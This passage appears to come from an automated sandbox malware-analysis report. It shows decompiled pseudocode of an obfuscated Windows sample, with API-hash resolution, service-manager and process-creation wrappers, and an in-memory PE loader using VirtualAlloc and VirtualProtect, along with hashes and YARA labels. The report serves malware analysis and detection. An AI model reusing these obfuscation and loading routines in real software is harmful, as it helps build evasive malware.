				_t209 = E006D976F( *(_t248 + 0x2c), _t248 + 4,  *(_t248 + 0x34),  *(_t248 + 0x3c),  *(_t248 + 0x40),  *(_t248 + 0x28), _t248 - 0x40, _t245,  *(_t248 + 0x24),  *(_t248 + 0x38), _t220,  *(_t248 + 0x58),  *(_t248 + 0x44), _t220,  *(_t248 + 0x20),  *(_t248 + 0x4c),  *((intOrPtr*)(_t248 + 0x64)), _t220,  *((intOrPtr*)(_t248 + 0x74))); // executed
				if(_t209 == 0) {
					_t210 = 0;
				} else {
					if(_t242 == 0) {
						E006D4F7D( *(_t248 + 0x50),  *(_t248 + 0x18),  *((intOrPtr*)(_t248 + 4)));
						E006D4F7D( *(_t248 + 0x14),  *(_t248 + 0x48),  *((intOrPtr*)(_t248 + 8)));
					} else {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
					}
					_t210 = 1;
				}
				return _t210;
			}















                                          0x006c568f
                                          0x006c569b
                                          0x006c569e
                                          0x006c56a0
                                          0x006c56a2
                                          0x006c56a5
                                          0x006c56a8
                                          0x006c56ab
                                          0x006c56ac
                                          0x006c56af
                                          0x006c56b2
                                          0x006c56b3
                                          0x006c56b4
                                          0x006c56b9
                                          0x006c56c2
                                          0x006c56cc
                                          0x006c56cf
                                          0x006c56d2
                                          0x006c56d9
                                          0x006c56e0
                                          0x006c56e4
                                          0x006c56ef
                                          0x006c56f2
                                          0x006c56f9
                                          0x006c5700
                                          0x006c570e
                                          0x006c5711
                                          0x006c5718
                                          0x006c5722
                                          0x006c5727
                                          0x006c572c
                                          0x006c5733
                                          0x006c573a
                                          0x006c5745
                                          0x006c5746
                                          0x006c5749
                                          0x006c574d
                                          0x006c5754
                                          0x006c575b
                                          0x006c575f
                                          0x006c5763
                                          0x006c576a
                                          0x006c5771
                                          0x006c577c
                                          0x006c577f
                                          0x006c5786
                                          0x006c578d
                                          0x006c5799
                                          0x006c579c
                                          0x006c57a3
                                          0x006c57aa
                                          0x006c57b1
                                          0x006c57b4
                                          0x006c57bb
                                          0x006c57c2
                                          0x006c57ca
                                          0x006c57cd
                                          0x006c57d4
                                          0x006c57db
                                          0x006c57df
                                          0x006c57e6
                                          0x006c57ea
                                          0x006c57f1
                                          0x006c57f8
                                          0x006c5801
                                          0x006c5808
                                          0x006c580f
                                          0x006c5816
                                          0x006c5822
                                          0x006c5827
                                          0x006c582c
                                          0x006c5833
                                          0x006c583a
                                          0x006c5841
                                          0x006c5848
                                          0x006c584f
                                          0x006c5856
                                          0x006c585d
                                          0x006c5867
                                          0x006c586a
                                          0x006c586d
                                          0x006c5874
                                          0x006c587b
                                          0x006c5882
                                          0x006c5889
                                          0x006c5890
                                          0x006c589b
                                          0x006c58a1
                                          0x006c58a8
                                          0x006c58af
                                          0x006c58b2
                                          0x006c58b9
                                          0x006c58c0
                                          0x006c58d3
                                          0x006c58d6
                                          0x006c58de
                                          0x006c5915
                                          0x006c591f
                                          0x006c5951
                                          0x006c5921
                                          0x006c5923
                                          0x006c593a
                                          0x006c5948
                                          0x006c5925
                                          0x006c5928
                                          0x006c5929
                                          0x006c592a
                                          0x006c592b
                                          0x006c592b
                                          0x006c592e
                                          0x006c592e
                                          0x006c5959

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID: @p
                                          • API String ID: 963392458-2609516012
                                          • Opcode ID: d31ca1205623dc1cdc77aa9fcf8a92b76c26a84db24defd749b4b1a88d353f87
                                          • Instruction ID: a0d37cf29bc1304b8910d44a1257786f46177b01af6a5621889f0e79d6b586fc
                                          • Opcode Fuzzy Hash: d31ca1205623dc1cdc77aa9fcf8a92b76c26a84db24defd749b4b1a88d353f87
                                          • Instruction Fuzzy Hash: 9E912572500288EFDF58CF61C94A9DE3BA2FF44348F508119FE16962A0D3B6D959CF84
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006CC0C6, Relevance: 1.4, Strings: 1, Instructions: 124COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 90%
                                          			E006CC0C6(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char _v592;
				void* _t141;
				void* _t159;
				signed int _t161;
				signed int _t162;
				signed int _t163;
				signed int _t164;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E006C602B(_t141);
				_v64 = _v64 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v72 = 0x2e7eef;
				_v68 = 0x12a0e3;
				_v36 = 0x822d;
				_v36 = _v36 ^ 0x7542ca13;
				_v36 = _v36 >> 8;
				_v36 = _v36 ^ 0x00755fa2;
				_v48 = 0xc0ea;
				_t161 = 0x4d;
				_v48 = _v48 * 0x52;
				_v48 = _v48 + 0x53ba;
				_v48 = _v48 ^ 0x003e0539;
				_v8 = 0xf2be;
				_v8 = _v8 ^ 0xca92c6dd;
				_v8 = _v8 | 0xdeb53509;
				_v8 = _v8 + 0x330e;
				_v8 = _v8 ^ 0xdeb75724;
				_v28 = 0xbc60;
				_v28 = _v28 * 3;
				_v28 = _v28 ^ 0x088be546;
				_v28 = _v28 ^ 0x0889fb38;
				_v20 = 0x79be;
				_v20 = _v20 / _t161;
				_t162 = 0x2f;
				_v20 = _v20 * 0x21;
				_v20 = _v20 / _t162;
				_v20 = _v20 ^ 0x000058f8;
				_v12 = 0x6f12;
				_v12 = _v12 + 0x2ef8;
				_v12 = _v12 ^ 0xc4c69b2c;
				_t163 = 0x19;
				_v12 = _v12 / _t163;
				_v12 = _v12 ^ 0x07dec8f1;
				_v16 = 0x233d;
				_v16 = _v16 >> 0xd;
				_v16 = _v16 ^ 0xb86ca57e;
				_v16 = _v16 ^ 0x25a63868;
				_v16 = _v16 ^ 0x9dca839c;
				_v44 = 0x9c92;
				_v44 = _v44 ^ 0x484225af;
				_v44 = _v44 << 0xa;
				_v44 = _v44 ^ 0x0ae4f7f7;
				_v56 = 0xf3a1;
				_v56 = _v56 + 0xffff3be5;
				_v56 = _v56 ^ 0x00000dea;
				_v24 = 0xe687;
				_v24 = _v24 ^ 0x2fa59812;
				_v24 = _v24 | 0x8a70baf8;
				_v24 = _v24 << 0xe;
				_v24 = _v24 ^ 0x7fbf04b5;
				_v40 = 0x7d0b;
				_v40 = _v40 + 0xffffa14c;
				_v40 = _v40 + 0x5747;
				_v40 = _v40 ^ 0x000069af;
				_v32 = 0xbccf;
				_v32 = _v32 << 0xb;
				_v32 = _v32 + 0xa312;
				_v32 = _v32 ^ 0x05e7304f;
				_v52 = 0xd186;
				_v52 = _v52 << 7;
				_t164 = 0xc;
				_v52 = _v52 / _t164;
				_v52 = _v52 ^ 0x0008a17f;
				_push(_v48);
				E006D7BAF(_v52,  &_v592, _v28, _a4, _v20, _v12, E006D889D(0x6dc050, _v36, _v52));
				E006D2025(_v16, _t154, _v44, _v56);
				_t159 = E006DAA3C(_v24, _v40, _v32, _v52,  &_v592); // executed
				return _t159;
			}



























                                          0x006cc0d0
                                          0x006cc0d3
                                          0x006cc0d6
                                          0x006cc0d9
                                          0x006cc0da
                                          0x006cc0db
                                          0x006cc0e0
                                          0x006cc0e6
                                          0x006cc0ea
                                          0x006cc0f1
                                          0x006cc0f8
                                          0x006cc0ff
                                          0x006cc106
                                          0x006cc10a
                                          0x006cc111
                                          0x006cc11e
                                          0x006cc121
                                          0x006cc124
                                          0x006cc12b
                                          0x006cc132
                                          0x006cc139
                                          0x006cc140
                                          0x006cc147
                                          0x006cc14e
                                          0x006cc155
                                          0x006cc160
                                          0x006cc163
                                          0x006cc16a
                                          0x006cc171
                                          0x006cc17f
                                          0x006cc186
                                          0x006cc189
                                          0x006cc193
                                          0x006cc196
                                          0x006cc19d
                                          0x006cc1a4
                                          0x006cc1ab
                                          0x006cc1b5
                                          0x006cc1b8
                                          0x006cc1bb
                                          0x006cc1c2
                                          0x006cc1c9
                                          0x006cc1cd
                                          0x006cc1d4
                                          0x006cc1db
                                          0x006cc1e2
                                          0x006cc1e9
                                          0x006cc1f0
                                          0x006cc1f4
                                          0x006cc1fb
                                          0x006cc202
                                          0x006cc209
                                          0x006cc210
                                          0x006cc217
                                          0x006cc21e
                                          0x006cc225
                                          0x006cc229
                                          0x006cc230
                                          0x006cc237
                                          0x006cc23e
                                          0x006cc245
                                          0x006cc24c
                                          0x006cc253
                                          0x006cc257
                                          0x006cc25e
                                          0x006cc265
                                          0x006cc26e
                                          0x006cc277
                                          0x006cc27f
                                          0x006cc282
                                          0x006cc289
                                          0x006cc2ad
                                          0x006cc2bd
                                          0x006cc2d5
                                          0x006cc2e1

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: DeleteFile
                                          • String ID: ~.
                                          • API String ID: 4033686569-2304494891
                                          • Opcode ID: 826762e58cd5e338586cf1ae24690b8851e4ed5ae47d36de2eaeecf5572fdf83
                                          • Instruction ID: 5568205177b44777e55481c921507bfbbdd6f4844e769742736e774d105b4ba2
                                          • Opcode Fuzzy Hash: 826762e58cd5e338586cf1ae24690b8851e4ed5ae47d36de2eaeecf5572fdf83
                                          • Instruction Fuzzy Hash: 365112B1C0121DEBDF48DFE5D94A8EEBBB2FB08304F208159E511B6260D7B91A54DF94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006C8736, Relevance: .1, Instructions: 56COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E006C8736(long __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t64;
				signed int _t66;
				signed int _t67;
				signed int _t68;
				long _t77;

				_v16 = 0x5e27;
				_v16 = _v16 >> 0x10;
				_v16 = _v16 + 0xcb06;
				_v16 = _v16 + 0xffffffa0;
				_v16 = _v16 ^ 0x0000caae;
				_v20 = 0x53d5;
				_v20 = _v20 << 0xf;
				_v20 = _v20 ^ 0x29eaafbc;
				_v12 = 0x2701;
				_t77 = __ecx;
				_t66 = 0x3f;
				_v12 = _v12 * 0x75;
				_v12 = _v12 / _t66;
				_v12 = _v12 >> 9;
				_v12 = _v12 ^ 0x0000510c;
				_v24 = 0xb555;
				_v24 = _v24 | 0xad821aca;
				_v24 = _v24 ^ 0xad82f196;
				_v8 = 0x411b;
				_t67 = 0x67;
				_v8 = _v8 / _t67;
				_t68 = 0x1c;
				_v8 = _v8 / _t68;
				_v8 = _v8 >> 8;
				_v8 = _v8 ^ 0x00005eaa;
				_t64 = E006D981E(_t77, E006CC506(_t68), _v16, _v12, _v24, _v8); // executed
				return _t64;
			}













                                          0x006c873c
                                          0x006c8745
                                          0x006c8749
                                          0x006c8750
                                          0x006c8754
                                          0x006c875b
                                          0x006c8762
                                          0x006c8766
                                          0x006c876d
                                          0x006c877b
                                          0x006c877d
                                          0x006c877e
                                          0x006c8788
                                          0x006c878d
                                          0x006c8791
                                          0x006c8798
                                          0x006c879f
                                          0x006c87a6
                                          0x006c87ad
                                          0x006c87b7
                                          0x006c87bc
                                          0x006c87c4
                                          0x006c87c7
                                          0x006c87ca
                                          0x006c87ce
                                          0x006c87ed
                                          0x006c87f9

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 143c34c34cbd3b33341801c7d9cc665edc253c7b9165565ce924f81eb71ba2ac
                                          • Instruction ID: e40efc28fc74b0942bb0964a788276a1189a712dacfe257a565ff7c0daa456b6
                                          • Opcode Fuzzy Hash: 143c34c34cbd3b33341801c7d9cc665edc253c7b9165565ce924f81eb71ba2ac
                                          • Instruction Fuzzy Hash: 6E215671D00209EFEF08DFA5D94A4DEBBB2EB44304F208199D415B7294E7B51B64DF85
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006C2959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 62%
                                          			E006C2959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E006C602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E006D07A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}









                                          0x006c295f
                                          0x006c2964
                                          0x006c2967
                                          0x006c296a
                                          0x006c296d
                                          0x006c296e
                                          0x006c296f
                                          0x006c2977
                                          0x006c2985
                                          0x006c298a
                                          0x006c2992
                                          0x006c299a
                                          0x006c29a2
                                          0x006c29a9
                                          0x006c29b0
                                          0x006c29b7
                                          0x006c29bb
                                          0x006c29cf
                                          0x006c29dc
                                          0x006c29e2

                                          APIs
                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 006C29DC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: ManagerOpen
                                          • String ID: <^
                                          • API String ID: 1889721586-3203995635
                                          • Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                          • Instruction ID: 0d90814f6e3e98dddc946965e93f2e1c0a25011b10019f6726629396f8a684e9
                                          • Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                          • Instruction Fuzzy Hash: 6A016D72A00108BFEB14DF95DC0A9DFBFB6EF44310F108089F508A6250D7B69F619B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006CC6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E006CC6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E006C602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E006D07A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}












                                          0x006cc6e1
                                          0x006cc6e6
                                          0x006cc6f0
                                          0x006cc6fc
                                          0x006cc703
                                          0x006cc706
                                          0x006cc70d
                                          0x006cc711
                                          0x006cc715
                                          0x006cc71c
                                          0x006cc723
                                          0x006cc72a
                                          0x006cc731
                                          0x006cc738
                                          0x006cc751
                                          0x006cc762
                                          0x006cc768

                                          APIs
                                          • SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 006CC762
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: FolderPath
                                          • String ID: /O
                                          • API String ID: 1514166925-1923427199
                                          • Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                          • Instruction ID: 7e0c757dfb255f1e9486b82fffa48cea1d3adc185dba1f33bdcace53b76a2b62
                                          • Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                          • Instruction Fuzzy Hash: 391133B290122DBBCB25DF94DD498EFBFB9EF04714F108188F90966210D3B14B659BE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006C1000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42libraryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 82%
                                          			E006C1000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E006C602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E006D07A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}











                                          0x006c1006
                                          0x006c1009
                                          0x006c100c
                                          0x006c1011
                                          0x006c1016
                                          0x006c101d
                                          0x006c1026
                                          0x006c102d
                                          0x006c1034
                                          0x006c103b
                                          0x006c1047
                                          0x006c104f
                                          0x006c1057
                                          0x006c105e
                                          0x006c1065
                                          0x006c106c
                                          0x006c1073
                                          0x006c1077
                                          0x006c108b
                                          0x006c1096
                                          0x006c109b

                                          APIs
                                          • LoadLibraryW.KERNEL32(0033A3B7), ref: 006C1096
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID: [
                                          • API String ID: 1029625771-3431493590
                                          • Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                          • Instruction ID: 595082948c127377ca9c24a2aaf2efaa831d8029a0979ed7cd247bea10029107
                                          • Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                          • Instruction Fuzzy Hash: C2015BB6D01309BBEF44DF94C94AADEBBB1EB54318F108188E41466291D3B19B649B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006C4859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E006C4859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E006D07A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}






                                          0x006c485e
                                          0x006c487a
                                          0x006c487d
                                          0x006c4884
                                          0x006c488b
                                          0x006c4892
                                          0x006c489d
                                          0x006c48a0
                                          0x006c48ad
                                          0x006c48b7

                                          APIs
                                          • ExitProcess.KERNELBASE(00000000), ref: 006C48B7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID: [
                                          • API String ID: 621844428-1822564810
                                          • Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                          • Instruction ID: f977ee72c49a2ce788bd0dd8ccf2a57d70dd6a84fe47d661be0c35e563bf7402
                                          • Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                          • Instruction Fuzzy Hash: 66F01D70D05209FBDB44CFE8C95699EBFB5EB40301F20818DE444B7290E3B15F509B54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 10001780, Relevance: 3.1, APIs: 2, Instructions: 66COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 94%
                                          			E10001780(intOrPtr* _a4, long _a8) {
				long _t31;
				signed int _t32;
				intOrPtr* _t37;
				void* _t47;
				void** _t48;
				signed int _t52;
				signed int _t55;
				long _t56;

				_t48 = _a8;
				_t56 = _t48[2];
				if(_t56 != 0) {
					_t52 = _t48[3];
					if((_t52 & 0x02000000) == 0) {
						_t31 =  *(0x10012080 + ((_t52 >> 0x1f) + ((_t52 >> 0x0000001e & 0x00000001) + (_t52 >> 0x0000001d & 0x00000001) * 2) * 2) * 4);
						if((_t52 & 0x04000000) != 0) {
							_t31 = _t31 | 0x00000200;
						}
						_t32 = VirtualProtect( *_t48, _t56, _t31,  &_a8); // executed
						asm("sbb eax, eax");
						return  ~( ~_t32);
					} else {
						_t47 =  *_t48;
						if(_t47 == _t48[1]) {
							if(_t48[4] != 0) {
								L7:
								VirtualFree(_t47, _t56, 0x4000); // executed
							} else {
								_t37 = _a4;
								_t55 =  *(_t37 + 0x30);
								if( *((intOrPtr*)( *_t37 + 0x38)) == _t55 || _t56 % _t55 == 0) {
									goto L7;
								}
							}
						}
						return 1;
					}
				} else {
					return _t56 + 1;
				}
			}











                                          0x10001783
                                          0x10001787
                                          0x1000178c
                                          0x10001797
                                          0x100017a0
                                          0x100017f9
                                          0x10001806
                                          0x10001808
                                          0x10001808
                                          0x10001815
                                          0x1000181d
                                          0x10001824
                                          0x100017a2
                                          0x100017a2
                                          0x100017a7
                                          0x100017ad
                                          0x100017c6
                                          0x100017cd
                                          0x100017af
                                          0x100017af
                                          0x100017b2
                                          0x100017ba
                                          0x00000000
                                          0x00000000
                                          0x100017ba
                                          0x100017ad
                                          0x100017db
                                          0x100017db
                                          0x1000178e
                                          0x10001793
                                          0x10001793

                                          APIs
                                          • VirtualFree.KERNELBASE(?,?,00004000,00000000,100013CB,?,1000195F,100013CB,?,00000000,00000000,00000000), ref: 100017CD
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2097429023.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000007.00000002.2097424498.0000000010000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097438801.000000001000D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097445868.0000000010012000.00000004.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097450834.0000000010015000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: FreeVirtual
                                          • String ID:
                                          • API String ID: 1263568516-0
                                          • Opcode ID: 0a855d0dde1407c1c92472205702e4fda3e9c4e53b097d130a35f6ebea364484
                                          • Instruction ID: f401046966946d9f8f8c45c464924eb5d72016bba8cd02ac906e1c8dccc1d15e
                                          • Opcode Fuzzy Hash: 0a855d0dde1407c1c92472205702e4fda3e9c4e53b097d130a35f6ebea364484
                                          • Instruction Fuzzy Hash: EB11BF327101198BE304DE09E880F9AB3BAFF947A0F46825AF509CB295DB30E951C790
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006D4F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 66%
                                          			E006D4F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E006C602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E006D07A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}







                                          0x006d4f80
                                          0x006d4f81
                                          0x006d4f82
                                          0x006d4f86
                                          0x006d4f87
                                          0x006d4f8c
                                          0x006d4fa5
                                          0x006d4fa8
                                          0x006d4faf
                                          0x006d4fb6
                                          0x006d4fc7
                                          0x006d4fca
                                          0x006d4fd7
                                          0x006d4fe2
                                          0x006d4fe7

                                          APIs
                                          • CloseHandle.KERNELBASE(003E66D8), ref: 006D4FE2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandle
                                          • String ID: {#lm
                                          • API String ID: 2962429428-1564096886
                                          • Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                          • Instruction ID: dc35befc03082ea648cf0aa4494a33d20af433371597595b82786401f99a50a2
                                          • Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                          • Instruction Fuzzy Hash: 3BF037B0C1120CFFEB04DFA4DA4689EBFBAEB40300F20819DE808BB250D3715B509B54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 10001620, Relevance: 2.6, APIs: 2, Instructions: 103memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 66%
                                          			E10001620(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr* _t30;
				signed int _t31;
				void* _t38;
				void* _t49;
				void* _t51;
				intOrPtr _t53;
				signed int _t54;
				intOrPtr _t55;
				long _t56;
				signed int _t58;
				signed int _t59;
				intOrPtr* _t65;
				long _t66;
				intOrPtr _t68;
				void* _t70;
				void* _t72;
				void* _t75;
				long* _t77;
				void* _t78;

				_t30 = _a16;
				_t55 =  *_t30;
				_t68 =  *((intOrPtr*)(_t30 + 4));
				_t31 =  *(_t55 + 0x14) & 0x0000ffff;
				_v8 = _t68;
				_v12 = 0;
				if(0 >=  *((intOrPtr*)(_t55 + 6))) {
					L15:
					return 1;
				} else {
					_t65 = VirtualAlloc;
					_t7 = _t55 + 0x28; // 0x28
					_t77 = _t7 + _t31;
					do {
						_t56 =  *_t77;
						if(_t56 != 0) {
							if(_a8 < _t77[1] + _t56) {
								SetLastError(0xd);
								goto L17;
							} else {
								_t38 = VirtualAlloc( *((intOrPtr*)(_t77 - 4)) + _t68, _t56, 0x1000, 4); // executed
								if(_t38 == 0) {
									goto L17;
								} else {
									_t66 =  *_t77;
									_t51 =  *((intOrPtr*)(_t77 - 4)) + _t68;
									_t70 = _t77[1] + _a4;
									if(_t66 != 0) {
										_t49 = _t51;
										_t75 = _t70 - _t51;
										do {
											 *_t49 =  *((intOrPtr*)(_t75 + _t49));
											_t49 = _t49 + 1;
											_t66 = _t66 - 1;
										} while (_t66 != 0);
									}
